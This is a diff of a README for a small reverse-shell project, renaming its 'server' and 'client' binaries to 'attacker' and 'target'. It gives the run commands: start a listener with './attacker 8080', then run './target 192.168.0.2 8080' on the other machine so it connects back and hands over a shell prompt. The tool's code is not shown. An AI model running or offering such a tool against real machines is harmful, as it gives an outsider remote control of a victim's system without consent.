Yashvendra/reverseShell/README.md

 On your machine setup a server and start listening on a port.

 ```
-./server 8080
+./attacker 8080
 ```

 ### 2. Execute client script and setup a connection to the server
-You can do this by simply executing the client compiled file
+You can do this by simply executing the target compiled file

 ```
-./client 192.168.0.2 8080
+./target 192.168.0.2 8080
 ```

 Now you should have a prompt on server machine.